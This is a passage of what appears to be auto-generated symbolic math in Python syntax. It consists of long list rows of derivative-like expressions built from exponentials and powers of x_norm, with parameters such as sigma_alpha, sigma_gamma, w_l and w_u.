1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)],
[x_norm**(-61.0)*(dy0*(dy0*y0*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 6*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (sigma_alpha**2 + 2*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)))*x_norm**7.0*exp((2*sigma_alpha**2 + 7*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + (dx0*x0 + dz0*z0)*(1.0*sigma_alpha**2*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((sigma_alpha**2 + 5*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + sigma_gamma**2*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + 
w_u)*x_norm**1.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (sigma_alpha**2 + 2*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2))*x_norm**8.0*exp((sigma_alpha**2 + 4*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)))*x_norm**46.0*exp((27*sigma_alpha**2 + 38*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dy0*x_norm**45.0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.5*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dy0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 
dy0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**5.5 + 4.0*alpha*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 + 2.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 2*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + 1.0*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**7.0)*exp((5 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**15.0*exp((7*sigma_alpha**2 + 
13*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp((23*sigma_alpha**2 + 39*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - (1 - exp(2*alpha*x_norm**0.5))*(dx0*(dz0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dx0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - 
w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dy0*x0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0) + dz0*(dx0*x0*y0*z0*x_norm**8.0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**5.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.5 - 2.0*sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 + 1.0*sigma_alpha**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 - 1.0*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0) + (dy0*z0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*y0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0) + dz0*y0*(4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**6.5 - 4.0*alpha*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.5 - 2.0*sigma_alpha**2*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**6.0 + sigma_alpha**2*sigma_gamma**2*(1 - 
exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 + 1.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0 - 1.0*sigma_gamma**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**7.0))*x_norm**7.0))*x_norm**46.0*exp((15*sigma_alpha**2 + 26*sigma_gamma**2)*x_norm**1.0/(sigma_alpha**2*sigma_gamma**2)) + (dx0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dx0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dx0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - 
exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*x0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) - dy0*sigma_alpha**2*sigma_gamma**2*x0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 2.0*sigma_alpha**2*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dy0*y0 + dz0*z0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*x0*y0*(1 - exp(2*alpha*x_norm**0.5))**2*(dy0*y0 + dz0*z0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))) + dz0*(-4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 4.0*alpha*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - 
exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.5*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - dy0*sigma_alpha**2*sigma_gamma**2*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*dz0*sigma_alpha**2*y0*(w_l - w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*(epsilon*(exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/sigma_alpha**2) - z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*exp(x_norm**1.0/(2*sigma_alpha**2)) + (exp(2*alpha*x_norm**0.5) + 1)**2*x_norm**1.0*exp(x_norm**1.0/(2*sigma_alpha**2)))*exp((7*sigma_alpha**2 + 11*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + dz0*sigma_gamma**2*y0*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*x_norm**9.0*(-4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*x_norm**4.5 + 4.0*alpha*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.5 + 2.0*sigma_alpha**2*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**4.0 + 1.0*z0**2*(1 - exp(2*alpha*x_norm**0.5))**2*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**5.0 - 1.0*(exp(2*alpha*x_norm**0.5) + 1)**3*x_norm**6.0)*exp((2 + (7*sigma_alpha**2 + 8*sigma_gamma**2)/(2*sigma_gamma**2))*x_norm**1.0/sigma_alpha**2) + 2.0*sigma_alpha**2*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + 
w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**13.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) - 1.0*sigma_alpha**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(1 - exp(x_norm**1.0/(2*sigma_alpha**2)))*(w_l - w_u)*(dx0*x0 + dy0*y0)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)) + 1.0*sigma_gamma**2*y0*z0*(1 - exp(2*alpha*x_norm**0.5))**2*(dx0*x0 + dy0*y0)*(-w_l*(1 - exp(x_norm**1.0/(2*sigma_gamma**2))) + w_u)*(exp(2*alpha*x_norm**0.5) + 1)*x_norm**14.0*exp((7*sigma_alpha**2 + 12*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))))*x_norm**46.0*exp((23*sigma_alpha**2 + 40*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2)))*exp(-(31*sigma_alpha**2 + 53*sigma_gamma**2)*x_norm**1.0/(2*sigma_alpha**2*sigma_gamma**2))/(sigma_alpha**2*sigma_gamma**2*(exp(2*alpha*x_norm**0.5) + 1)**3)],
